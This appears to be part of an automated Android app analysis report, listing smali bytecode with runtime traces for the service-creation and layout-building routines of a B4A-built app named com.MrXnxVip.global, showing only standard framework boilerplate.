                        82sget-object v0, Lcom/MrXnxVip/global/newmessage1;->processBA:Lanywheresoftware/b4a/BA;
                        83iput-object p0, v0, Lanywheresoftware/b4a/BA;->service:Landroid/app/Service;
                        85sget-object v0, Lcom/MrXnxVip/global/newmessage1;->processBA:Lanywheresoftware/b4a/BA;
                        87invoke-static {v0}, Lanywheresoftware/b4a/BA;->isShellModeRuntimeCheck(Lanywheresoftware/b4a/BA;)Z
                        88move-result v0
                        89if-eqz v0, :cond_9b
                        91sget-object v3, Lcom/MrXnxVip/global/newmessage1;->processBA:Lanywheresoftware/b4a/BA;
                        92const/4 v4, 0x0
                        93const/4 v5, 0x1
                        94const/4 v7, 0x1
                        95const/4 v0, 0x4
                        96new-array v8, v0, [Ljava/lang/Object;
                        98const-string v0, "com.MrXnxVip.global.newmessage1"
                        99aput-object v0, v8, v2
                        100const/4 v0, 0x1
                        101aput-object v3, v8, v0
                        102const/4 v0, 0x2
                        104iget-object v6, p0, Lcom/MrXnxVip/global/newmessage1;->_service:Lanywheresoftware/b4a/objects/ServiceHelper;
                        105aput-object v6, v8, v0
                        106const/4 v0, 0x3
                        107sget v6, Lanywheresoftware/b4a/keywords/Common;->Density:F
                        109invoke-static {v6}, Ljava/lang/Float;->valueOf(F)Ljava/lang/Float;
                        110move-result-object v6
                        111aput-object v6, v8, v0
                        113const-string v6, "CREATE"
                        115invoke-virtual/range {v3 .. v8}, Lanywheresoftware/b4a/BA;->raiseEvent2(Ljava/lang/Object;ZLjava/lang/String;Z[Ljava/lang/Object;)Ljava/lang/Object;
                        116cond_9b:
                        117sget-object v0, Lcom/MrXnxVip/global/newmessage1;->processBA:Lanywheresoftware/b4a/BA;
                        119invoke-static {v0, v2}, Lanywheresoftware/b4a/objects/ServiceHelper$StarterHelper;->startFromServiceCreate(Lanywheresoftware/b4a/BA;Z)Z
                        120move-result v0
                        121if-nez v0, :cond_a4
                        122goto/16 :goto_b7
                        123cond_a4:
                        124sget-object v0, Lcom/MrXnxVip/global/newmessage1;->processBA:Lanywheresoftware/b4a/BA;
                        126invoke-virtual {v0, v2}, Lanywheresoftware/b4a/BA;->setActivityPaused(Z)V
                        128const-string v0, "*** Service (newmessage1) Create ***"
                        130invoke-static {v0}, Lanywheresoftware/b4a/BA;->LogInfo(Ljava/lang/String;)V
                        • Time: 696027
                          • p0: *** Service (newmessage1) Create ***
                        132sget-object v0, Lcom/MrXnxVip/global/newmessage1;->processBA:Lanywheresoftware/b4a/BA;
                        133new-array v2, v2, [Ljava/lang/Object;
                        135const-string v3, "service_create"
                        137invoke-virtual {v0, v1, v3, v2}, Lanywheresoftware/b4a/BA;->raiseEvent(Ljava/lang/Object;Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/Object;
                        138goto_b7:
                        139sget-object v0, Lcom/MrXnxVip/global/newmessage1;->processBA:Lanywheresoftware/b4a/BA;
                        141const-string v2, "oncreate"
                        143invoke-virtual {v0, v2, p0, v1}, Lanywheresoftware/b4a/BA;->runHook(Ljava/lang/String;Ljava/lang/Object;[Ljava/lang/Object;)Z
                        144return-void
                        APIs
                        • android.app.Service.onCreate
                        • com.MrXnxVip.global.starter.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.starter.processBA:Lanywheresoftware/b4a/BA
                        • java.lang.StringBuilder.<init>
                        • android.app.Application.getPackageName
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Class.forName
                        • java.lang.Class.getMethod
                        • java.lang.reflect.Method.invoke
                        • com.MrXnxVip.global.starter.processBA:Lanywheresoftware/b4a/BA
                        • java.lang.Object.getClass
                        • java.lang.RuntimeException.<init>
                        • com.MrXnxVip.global.starter.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.starter.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.starter.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.starter._service:Lanywheresoftware/b4a/objects/ServiceHelper
                        • java.lang.Float.valueOf
                        • com.MrXnxVip.global.starter.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.starter.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.starter.processBA:Lanywheresoftware/b4a/BA
                        Strings
                        • com.MrXnxVip.global.starter
                        • SHELL
                        • com.MrXnxVip.global
                        • .main
                        • com.MrXnxVip.global.main
                        • initializeProcessGlobals
                        • CREATE
                        • *** Service (starter) Create ***
                        • service_create
                        • oncreate
                        Position Instruction Meta Information
                        1invoke-super {p0}, Landroid/app/Service;->onCreate()V
                        2sput-object p0, Lcom/MrXnxVip/global/starter;->mostCurrent:Lcom/MrXnxVip/global/starter;
                        4sget-object v0, Lcom/MrXnxVip/global/starter;->processBA:Lanywheresoftware/b4a/BA;
                        5const/4 v1, 0x0
                        6const/4 v2, 0x0
                        7if-nez v0, :cond_66
                        8new-instance v0, Lanywheresoftware/b4a/BA;
                        9const/4 v5, 0x0
                        10const/4 v6, 0x0
                        12const-string v7, "com.MrXnxVip.global"
                        14const-string v8, "com.MrXnxVip.global.starter"
                        15move-object v3, v0
                        16move-object v4, p0
                        18invoke-direct/range {v3 .. v8}, Lanywheresoftware/b4a/BA;-><init>(Landroid/content/Context;Lanywheresoftware/b4a/BALayout;Lanywheresoftware/b4a/BA;Ljava/lang/String;Ljava/lang/String;)V
                        19sput-object v0, Lcom/MrXnxVip/global/starter;->processBA:Lanywheresoftware/b4a/BA;
                        21invoke-static {v0}, Lanywheresoftware/b4a/BA;->isShellModeRuntimeCheck(Lanywheresoftware/b4a/BA;)Z
                        22move-result v0
                        23if-eqz v0, :cond_2c
                        25sget-object v3, Lcom/MrXnxVip/global/starter;->processBA:Lanywheresoftware/b4a/BA;
                        26const/4 v4, 0x0
                        27const/4 v5, 0x1
                        28const/4 v7, 0x0
                        29new-array v8, v2, [Ljava/lang/Object;
                        31const-string v6, "SHELL"
                        33invoke-virtual/range {v3 .. v8}, Lanywheresoftware/b4a/BA;->raiseEvent2(Ljava/lang/Object;ZLjava/lang/String;Z[Ljava/lang/Object;)Ljava/lang/Object;
                        34try_start_2c: new-instance v0, Ljava/lang/StringBuilder;
                        36invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        38sget-object v3, Lanywheresoftware/b4a/BA;->applicationContext:Landroid/app/Application;
                        40invoke-virtual {v3}, Landroid/app/Application;->getPackageName()Ljava/lang/String;
                        • Time: 685738
                          • This:
                            • android.app.Application@feb8753
                          • Return:
                            • com.MrXnxVip.global
                        41move-result-object v3
                        43invoke-virtual {v0, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        45const-string v3, ".main"
                        47invoke-virtual {v0, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        49invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        50move-result-object v0
                        52invoke-static {v0}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
                        • Time: 685741
                          • p0: com.MrXnxVip.global.main
                          • Return:
                            • class com.MrXnxVip.global.main
                            • getName: com.MrXnxVip.global.main
                        53move-result-object v0
                        55const-string v3, "initializeProcessGlobals"
                        56new-array v4, v2, [Ljava/lang/Class;
                        58invoke-virtual {v0, v3, v4}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
                        • Time: 685741
                          • This:
                            • class com.MrXnxVip.global.main
                            • getName:com.MrXnxVip.global.main
                          • p0: 1
                          • p1: [Ljava.lang.Class;@1186958
                          • Return:
                            • public static void com.MrXnxVip.global.main.initializeProcessGlobals()
                            • getName: initializeProcessGlobals
                        59move-result-object v0
                        61invoke-virtual {v0, v1, v1}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
                        • Time: 685874
                          • This:
                            • public static void com.MrXnxVip.global.main.initializeProcessGlobals()
                            • getName:initializeProcessGlobals
                          • p0: null
                          • p1: null
                          • Return:
                            • null
                        • Reflective invoke: com.MrXnxVip.global.main.initializeProcessGlobals
                          • Return:
                            • null
                        62try_end_52:
                        63sget-object v0, Lcom/MrXnxVip/global/starter;->processBA:Lanywheresoftware/b4a/BA;
                        65invoke-virtual {p0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
                        • Time: 685877
                          • This:
                            • com.MrXnxVip.global.starter@8a8591
                          • Return:
                            • class com.MrXnxVip.global.starter
                            • getName: com.MrXnxVip.global.starter
                        66move-result-object v3
                        68invoke-virtual {v0, v3}, Lanywheresoftware/b4a/BA;->loadHtSubs(Ljava/lang/Class;)V
                        70invoke-static {}, Lanywheresoftware/b4a/objects/ServiceHelper;->init()V
                        71goto/16 :goto_66
                        72catch_5f: move-exception v0
                        73new-instance v1, Ljava/lang/RuntimeException;
                        75invoke-direct {v1, v0}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/Throwable;)V
                        76throw v1
                        77goto_66: new-instance v0, Lanywheresoftware/b4a/objects/ServiceHelper;
                        79invoke-direct {v0, p0}, Lanywheresoftware/b4a/objects/ServiceHelper;-><init>(Landroid/app/Service;)V
                        80iput-object v0, p0, Lcom/MrXnxVip/global/starter;->_service:Lanywheresoftware/b4a/objects/ServiceHelper;
                        82sget-object v0, Lcom/MrXnxVip/global/starter;->processBA:Lanywheresoftware/b4a/BA;
                        83iput-object p0, v0, Lanywheresoftware/b4a/BA;->service:Landroid/app/Service;
                        85sget-object v0, Lcom/MrXnxVip/global/starter;->processBA:Lanywheresoftware/b4a/BA;
                        87invoke-static {v0}, Lanywheresoftware/b4a/BA;->isShellModeRuntimeCheck(Lanywheresoftware/b4a/BA;)Z
                        88move-result v0
                        89if-eqz v0, :cond_9b
                        91sget-object v3, Lcom/MrXnxVip/global/starter;->processBA:Lanywheresoftware/b4a/BA;
                        92const/4 v4, 0x0
                        93const/4 v5, 0x1
                        94const/4 v7, 0x1
                        95const/4 v0, 0x4
                        96new-array v8, v0, [Ljava/lang/Object;
                        98const-string v0, "com.MrXnxVip.global.starter"
                        99aput-object v0, v8, v2
                        100const/4 v0, 0x1
                        101aput-object v3, v8, v0
                        102const/4 v0, 0x2
                        104iget-object v6, p0, Lcom/MrXnxVip/global/starter;->_service:Lanywheresoftware/b4a/objects/ServiceHelper;
                        105aput-object v6, v8, v0
                        106const/4 v0, 0x3
                        107sget v6, Lanywheresoftware/b4a/keywords/Common;->Density:F
                        109invoke-static {v6}, Ljava/lang/Float;->valueOf(F)Ljava/lang/Float;
                        110move-result-object v6
                        111aput-object v6, v8, v0
                        113const-string v6, "CREATE"
                        115invoke-virtual/range {v3 .. v8}, Lanywheresoftware/b4a/BA;->raiseEvent2(Ljava/lang/Object;ZLjava/lang/String;Z[Ljava/lang/Object;)Ljava/lang/Object;
                        116cond_9b:
                        117sget-object v0, Lcom/MrXnxVip/global/starter;->processBA:Lanywheresoftware/b4a/BA;
                        119invoke-virtual {v0, v2}, Lanywheresoftware/b4a/BA;->setActivityPaused(Z)V
                        121const-string v0, "*** Service (starter) Create ***"
                        123invoke-static {v0}, Lanywheresoftware/b4a/BA;->LogInfo(Ljava/lang/String;)V
                        • Time: 685983
                          • p0: java.lang.String@cb501d0
                        125sget-object v0, Lcom/MrXnxVip/global/starter;->processBA:Lanywheresoftware/b4a/BA;
                        126new-array v2, v2, [Ljava/lang/Object;
                        128const-string v3, "service_create"
                        130invoke-virtual {v0, v1, v3, v2}, Lanywheresoftware/b4a/BA;->raiseEvent(Ljava/lang/Object;Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/Object;
                        132sget-object v0, Lcom/MrXnxVip/global/starter;->processBA:Lanywheresoftware/b4a/BA;
                        134const-string v2, "oncreate"
                        136invoke-virtual {v0, v2, p0, v1}, Lanywheresoftware/b4a/BA;->runHook(Ljava/lang/String;Ljava/lang/Object;[Ljava/lang/Object;)Z
                        138invoke-static {}, Lanywheresoftware/b4a/objects/ServiceHelper$StarterHelper;->runWaitForLayouts()V
                        139return-void
                        APIs
                        • android.app.Service.onCreate
                        • com.MrXnxVip.global.pnservices.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.pnservices.processBA:Lanywheresoftware/b4a/BA
                        • java.lang.StringBuilder.<init>
                        • android.app.Application.getPackageName
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Class.forName
                        • java.lang.Class.getMethod
                        • java.lang.reflect.Method.invoke
                        • com.MrXnxVip.global.pnservices.processBA:Lanywheresoftware/b4a/BA
                        • java.lang.Object.getClass
                        • java.lang.RuntimeException.<init>
                        • com.MrXnxVip.global.pnservices.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.pnservices.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.pnservices.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.pnservices._service:Lanywheresoftware/b4a/objects/ServiceHelper
                        • java.lang.Float.valueOf
                        • com.MrXnxVip.global.pnservices.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.pnservices.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.pnservices.processBA:Lanywheresoftware/b4a/BA
                        • com.MrXnxVip.global.pnservices.processBA:Lanywheresoftware/b4a/BA
                        Strings
                        • com.MrXnxVip.global
                        • com.MrXnxVip.global.pnservices
                        • SHELL
                        • .main
                        • initializeProcessGlobals
                        • CREATE
                        • *** Service (pnservices) Create ***
                        • service_create
                        • oncreate
                        Position Instruction Meta Information
                        1invoke-super {p0}, Landroid/app/Service;->onCreate()V
                        2sput-object p0, Lcom/MrXnxVip/global/pnservices;->mostCurrent:Lcom/MrXnxVip/global/pnservices;
                        4sget-object v0, Lcom/MrXnxVip/global/pnservices;->processBA:Lanywheresoftware/b4a/BA;
                        5const/4 v1, 0x0
                        6const/4 v2, 0x0
                        7if-nez v0, :cond_66
                        8new-instance v0, Lanywheresoftware/b4a/BA;
                        9const/4 v5, 0x0
                        10const/4 v6, 0x0
                        12const-string v7, "com.MrXnxVip.global"
                        14const-string v8, "com.MrXnxVip.global.pnservices"
                        15move-object v3, v0
                        16move-object v4, p0
                        18invoke-direct/range {v3 .. v8}, Lanywheresoftware/b4a/BA;-><init>(Landroid/content/Context;Lanywheresoftware/b4a/BALayout;Lanywheresoftware/b4a/BA;Ljava/lang/String;Ljava/lang/String;)V
                        19sput-object v0, Lcom/MrXnxVip/global/pnservices;->processBA:Lanywheresoftware/b4a/BA;
                        21invoke-static {v0}, Lanywheresoftware/b4a/BA;->isShellModeRuntimeCheck(Lanywheresoftware/b4a/BA;)Z
                        22move-result v0
                        23if-eqz v0, :cond_2c
                        25sget-object v3, Lcom/MrXnxVip/global/pnservices;->processBA:Lanywheresoftware/b4a/BA;
                        26const/4 v4, 0x0
                        27const/4 v5, 0x1
                        28const/4 v7, 0x0
                        29new-array v8, v2, [Ljava/lang/Object;
                        31const-string v6, "SHELL"
                        33invoke-virtual/range {v3 .. v8}, Lanywheresoftware/b4a/BA;->raiseEvent2(Ljava/lang/Object;ZLjava/lang/String;Z[Ljava/lang/Object;)Ljava/lang/Object;
                        34try_start_2c: new-instance v0, Ljava/lang/StringBuilder;
                        36invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        38sget-object v3, Lanywheresoftware/b4a/BA;->applicationContext:Landroid/app/Application;
                        40invoke-virtual {v3}, Landroid/app/Application;->getPackageName()Ljava/lang/String;
                        41move-result-object v3
                        43invoke-virtual {v0, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        45const-string v3, ".main"
                        47invoke-virtual {v0, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        49invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        50move-result-object v0
                        52invoke-static {v0}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
                        53move-result-object v0
                        55const-string v3, "initializeProcessGlobals"
                        56new-array v4, v2, [Ljava/lang/Class;
                        58invoke-virtual {v0, v3, v4}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
                        • Time: 812160
                          • This:
                            • class com.MrXnxVip.global.main
                            • getName:com.MrXnxVip.global.main
                          • p0: 1
                          • p1: [Ljava.lang.Class;@c72b2f7
                          • Return:
                            • public static void com.MrXnxVip.global.main.initializeProcessGlobals()
                            • getName: initializeProcessGlobals
                        59move-result-object v0
                        61invoke-virtual {v0, v1, v1}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
                        • Time: 812162
                          • This:
                            • public static void com.MrXnxVip.global.main.initializeProcessGlobals()
                            • getName:initializeProcessGlobals
                          • p0: null
                          • p1: null
                          • Return:
                            • null
                        • Reflective invoke: com.MrXnxVip.global.main.initializeProcessGlobals
                          • Return:
                            • null
                        62try_end_52:
                        63sget-object v0, Lcom/MrXnxVip/global/pnservices;->processBA:Lanywheresoftware/b4a/BA;
                        65invoke-virtual {p0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
                        • Time: 812163
                          • This:
                            • com.MrXnxVip.global.pnservices@cde13cd
                          • Return:
                            • class com.MrXnxVip.global.pnservices
                            • getName: com.MrXnxVip.global.pnservices
                        66move-result-object v3
                        68invoke-virtual {v0, v3}, Lanywheresoftware/b4a/BA;->loadHtSubs(Ljava/lang/Class;)V
                        70invoke-static {}, Lanywheresoftware/b4a/objects/ServiceHelper;->init()V
                        71goto/16 :goto_66
                        72catch_5f: move-exception v0
                        73new-instance v1, Ljava/lang/RuntimeException;
                        75invoke-direct {v1, v0}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/Throwable;)V
                        76throw v1
                        77goto_66: new-instance v0, Lanywheresoftware/b4a/objects/ServiceHelper;
                        79invoke-direct {v0, p0}, Lanywheresoftware/b4a/objects/ServiceHelper;-><init>(Landroid/app/Service;)V
                        80iput-object v0, p0, Lcom/MrXnxVip/global/pnservices;->_service:Lanywheresoftware/b4a/objects/ServiceHelper;
                        82sget-object v0, Lcom/MrXnxVip/global/pnservices;->processBA:Lanywheresoftware/b4a/BA;
                        83iput-object p0, v0, Lanywheresoftware/b4a/BA;->service:Landroid/app/Service;
                        85sget-object v0, Lcom/MrXnxVip/global/pnservices;->processBA:Lanywheresoftware/b4a/BA;
                        87invoke-static {v0}, Lanywheresoftware/b4a/BA;->isShellModeRuntimeCheck(Lanywheresoftware/b4a/BA;)Z
                        88move-result v0
                        89if-eqz v0, :cond_9b
                        91sget-object v3, Lcom/MrXnxVip/global/pnservices;->processBA:Lanywheresoftware/b4a/BA;
                        92const/4 v4, 0x0
                        93const/4 v5, 0x1
                        94const/4 v7, 0x1
                        95const/4 v0, 0x4
                        96new-array v8, v0, [Ljava/lang/Object;
                        98const-string v0, "com.MrXnxVip.global.pnservices"
                        99aput-object v0, v8, v2
                        100const/4 v0, 0x1
                        101aput-object v3, v8, v0
                        102const/4 v0, 0x2
                        104iget-object v6, p0, Lcom/MrXnxVip/global/pnservices;->_service:Lanywheresoftware/b4a/objects/ServiceHelper;
                        105aput-object v6, v8, v0
                        106const/4 v0, 0x3
                        107sget v6, Lanywheresoftware/b4a/keywords/Common;->Density:F
                        109invoke-static {v6}, Ljava/lang/Float;->valueOf(F)Ljava/lang/Float;
                        110move-result-object v6
                        111aput-object v6, v8, v0
                        113const-string v6, "CREATE"
                        115invoke-virtual/range {v3 .. v8}, Lanywheresoftware/b4a/BA;->raiseEvent2(Ljava/lang/Object;ZLjava/lang/String;Z[Ljava/lang/Object;)Ljava/lang/Object;
                        116cond_9b:
                        117sget-object v0, Lcom/MrXnxVip/global/pnservices;->processBA:Lanywheresoftware/b4a/BA;
                        119invoke-static {v0, v2}, Lanywheresoftware/b4a/objects/ServiceHelper$StarterHelper;->startFromServiceCreate(Lanywheresoftware/b4a/BA;Z)Z
                        120move-result v0
                        121if-nez v0, :cond_a4
                        122goto/16 :goto_b7
                        123cond_a4:
                        124sget-object v0, Lcom/MrXnxVip/global/pnservices;->processBA:Lanywheresoftware/b4a/BA;
                        126invoke-virtual {v0, v2}, Lanywheresoftware/b4a/BA;->setActivityPaused(Z)V
                        128const-string v0, "*** Service (pnservices) Create ***"
                        130invoke-static {v0}, Lanywheresoftware/b4a/BA;->LogInfo(Ljava/lang/String;)V
                        • Time: 812171
                          • p0: *** Service (pnservices) Create ***
                        132sget-object v0, Lcom/MrXnxVip/global/pnservices;->processBA:Lanywheresoftware/b4a/BA;
                        133new-array v2, v2, [Ljava/lang/Object;
                        135const-string v3, "service_create"
                        137invoke-virtual {v0, v1, v3, v2}, Lanywheresoftware/b4a/BA;->raiseEvent(Ljava/lang/Object;Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/Object;
                        138goto_b7:
                        139sget-object v0, Lcom/MrXnxVip/global/pnservices;->processBA:Lanywheresoftware/b4a/BA;
                        141const-string v2, "oncreate"
                        143invoke-virtual {v0, v2, p0, v1}, Lanywheresoftware/b4a/BA;->runHook(Ljava/lang/String;Ljava/lang/Object;[Ljava/lang/Object;)Z
                        144return-void
                        Cross References
                        APIs
                        • java.util.HashMap.get
                        • java.lang.String.startsWith
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Class.forName
                        • java.lang.Boolean.TYPE:Ljava/lang/Class
                        • java.lang.Class.getMethod
                        • java.lang.Boolean.valueOf
                        • java.lang.reflect.Method.invoke
                        • android.util.Log.e
                        • java.lang.reflect.InvocationTargetException.getCause
                        • android.util.Log.e
                        Strings
                        • B4A
                        • type
                        • .
                        • anywheresoftware.b4a.objects
                        • anywheresoftware.b4a.objects.ActivityWrapper
                        • anywheresoftware.b4a.objects.WebViewWrapper
                        • anywheresoftware.b4a.objects.drawable.ColorDrawable
                        • build
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"<T:",
                        3"Ljava/lang/Object;",
                        4">(",
                        5"Ljava/lang/Object;",
                        6"Ljava/util/HashMap<",
                        7"Ljava/lang/String;",
                        8"Ljava/lang/Object;",
                        9">;Z",
                        10"Ljava/lang/Object;",
                        11")TT;"
                        12}
                        13.end annotation
                        15const-string v0, "B4A"
                        17const-string v1, ""
                        19const-string v2, "type"
                        21invoke-virtual {p1, v2}, Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        22move-result-object v2
                        23check-cast v2, Ljava/lang/String;
                        24const/4 v3, 0x0
                        25try_start_d:
                        26const-string v4, "."
                        28invoke-virtual {v2, v4}, Ljava/lang/String;->startsWith(Ljava/lang/String;)Z
                        29move-result v4
                        30if-eqz v4, :cond_23
                        31new-instance v4, Ljava/lang/StringBuilder;
                        33const-string v5, "anywheresoftware.b4a.objects"
                        35invoke-direct {v4, v5}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        37invoke-virtual {v4, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        39invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        40move-result-object v2
                        41cond_23:
                        42invoke-static {v2}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
                        • Time: 690715
                          • p0: anywheresoftware.b4a.objects.ActivityWrapper
                          • Return:
                            • java.lang.Class@1a47190
                            • getName: anywheresoftware.b4a.objects.ActivityWrapper
                        • Time: 690718
                          • p0: anywheresoftware.b4a.objects.drawable.ColorDrawable
                          • Return:
                            • class anywheresoftware.b4a.objects.drawable.ColorDrawable
                            • getName: anywheresoftware.b4a.objects.drawable.ColorDrawable
                        • Time: 690725
                          • p0: anywheresoftware.b4a.objects.WebViewWrapper
                          • Return:
                            • class anywheresoftware.b4a.objects.WebViewWrapper
                            • getName: anywheresoftware.b4a.objects.WebViewWrapper
                        43move-result-object v2
                        45const-string v4, "build"
                        46const/4 v5, 0x4
                        47new-array v6, v5, [Ljava/lang/Class;
                        48const-class v7, Ljava/lang/Object;
                        49const/4 v8, 0x0
                        50aput-object v7, v6, v8
                        51const-class v7, Ljava/util/HashMap;
                        52const/4 v9, 0x1
                        53aput-object v7, v6, v9
                        55sget-object v7, Ljava/lang/Boolean;->TYPE:Ljava/lang/Class;
                        56const/4 v10, 0x2
                        57aput-object v7, v6, v10
                        58const-class v7, Ljava/lang/Object;
                        59const/4 v11, 0x3
                        60aput-object v7, v6, v11
                        62invoke-virtual {v2, v4, v6}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
                        • Time: 690716
                          • This:
                            • java.lang.Class@1a47190
                            • getName:anywheresoftware.b4a.objects.ActivityWrapper
                          • p0: build
                          • p1: [Ljava.lang.Class;@6bf5ec0
                          • p1.Arrays.toString: [class java.lang.Object, class java.util.HashMap, boolean, class java.lang.Object]
                          • Return:
                            • public static android.view.View anywheresoftware.b4a.objects.ActivityWrapper.build(java.lang.Object,java.util.HashMap,boolean,java.lang.Object) throws java.lang.Exception
                            • getName: build
                        • Time: 690720
                          • This:
                            • class anywheresoftware.b4a.objects.drawable.ColorDrawable
                            • getName:anywheresoftware.b4a.objects.drawable.ColorDrawable
                          • p0: build
                          • p1: [Ljava.lang.Class;@19ba6ec
                          • p1.Arrays.toString: [class java.lang.Object, class java.util.HashMap, boolean, class java.lang.Object]
                          • Return:
                            • public static android.graphics.drawable.Drawable anywheresoftware.b4a.objects.drawable.ColorDrawable.build(java.lang.Object,java.util.HashMap,boolean,java.lang.Object)
                            • getName: build
                        • Time: 690727
                          • This:
                            • class anywheresoftware.b4a.objects.WebViewWrapper
                            • getName:anywheresoftware.b4a.objects.WebViewWrapper
                          • p0: build
                          • p1: [Ljava.lang.Class;@f0eac16
                          • p1.Arrays.toString: [class java.lang.Object, class java.util.HashMap, boolean, class java.lang.Object]
                          • Return:
                            • public static android.view.View anywheresoftware.b4a.objects.WebViewWrapper.build(java.lang.Object,java.util.HashMap,boolean,java.lang.Object) throws java.lang.Exception
                            • getName: build
                        63move-result-object v2
                        64new-array v4, v5, [Ljava/lang/Object;
                        65aput-object p0, v4, v8
                        66aput-object p1, v4, v9
                        68invoke-static {p2}, Ljava/lang/Boolean;->valueOf(Z)Ljava/lang/Boolean;
                        69move-result-object p0
                        70aput-object p0, v4, v10
                        71aput-object p3, v4, v11
                        73invoke-virtual {v2, v3, v4}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
                        • Reflective invoke: anywheresoftware.b4a.objects.drawable.ColorDrawable.build
                          • p0: anywheresoftware.b4a.BALayout{9f7a3e0 V.E...... ........ 0
                          • p1: 0-441
                          • p2: 597 #1}
                          • p3: {color=-984833
                          • p4: csType=Dbasic.Designer.Drawable.ColorDrawable
                          • p5: type=.drawable.ColorDrawable}
                          • p6: false
                          • p7: null
                          • Return:
                            • null
                        • Time: 690722
                          • This:
                            • public static android.graphics.drawable.Drawable anywheresoftware.b4a.objects.drawable.ColorDrawable.build(java.lang.Object,java.util.HashMap,boolean,java.lang.Object)
                            • getName:build
                          • p0: null
                          • p1: [Ljava.lang.Object;@875854a
                          • p1.Arrays.toString: [anywheresoftware.b4a.BALayout{9f7a3e0 V.E...... ........ 0,0-441,597 #1}, {color=-984833, csType=Dbasic.Designer.Drawable.ColorDrawable, type=.drawable.ColorDrawable}, false, null]
                          • Return:
                            • null
                        • Reflective invoke: anywheresoftware.b4a.objects.ActivityWrapper.build
                          • p0: anywheresoftware.b4a.BALayout{9f7a3e0 V.E...... ........ 0
                          • p1: 0-441
                          • p2: 597 #1}
                          • p3: {parent=
                          • p4: drawable={color=-984833
                          • p5: csType=Dbasic.Designer.Drawable.ColorDrawable
                          • p6: type=.drawable.ColorDrawable}
                          • p7: visible=true
                          • p8: :kids={0={padding=null
                          • p9: parent=Activity
                          • p10: visible=true
                          • p11: csType=Dbasic.Designer.MetaWebView
                          • p12: zoomEnabled=false
                          • p13: vanchor=0
                          • p14: type=.WebViewWrapper
                          • p15: enabled=true
                          • p16: variant0={top=0
                          • p17: left=0
                          • p18: hanchor=0
                          • p19: width=320
                          • p20: vanchor=0
                          • p21: height=430}
                          • p22: javaType=.WebViewWrapper
                          • p23: top=100
                          • p24: left=100
                          • p25: hanchor=0
                          • p26: name=WebView1
                          • p27: width=200
                          • p28: eventName=WebView1
                          • p29: javaScriptEnabled=true
                          • p30: tag=
                          • p31: height=200}}
                          • p32: csType=Dbasic.Designer.MetaActivity
                          • p33: type=.ActivityWrapper
                          • p34: title=Activity
                          • p35: variant0={top=100
                          • p36: left=100
                          • p37: hanchor=0
                          • p38: width=100
                          • p39: vanchor=0
                          • p40: height=100}
                          • p41: fullScreen=false
                          • p42: javaType=.ActivityWrapper
                          • p43: animationDuration=400
                          • p44: titleColor=-984833
                          • p45: top=100
                          • p46: left=100
                          • p47: name=Activity
                          • p48: width=100
                          • p49: eventName=Activity
                          • p50: includeTitle=false
                          • p51: tag=
                          • p52: height=100}
                          • p53: false
                          • p54: com.MrXnxVip.global.main@ff69451
                          • Return:
                            • anywheresoftware.b4a.BALayout{9f7a3e0 V.E...... ......I. 0,0-0,0}
                        • Time: 690723
                          • This:
                            • public static android.view.View anywheresoftware.b4a.objects.ActivityWrapper.build(java.lang.Object,java.util.HashMap,boolean,java.lang.Object) throws java.lang.Exception
                            • getName:build
                          • p0: null
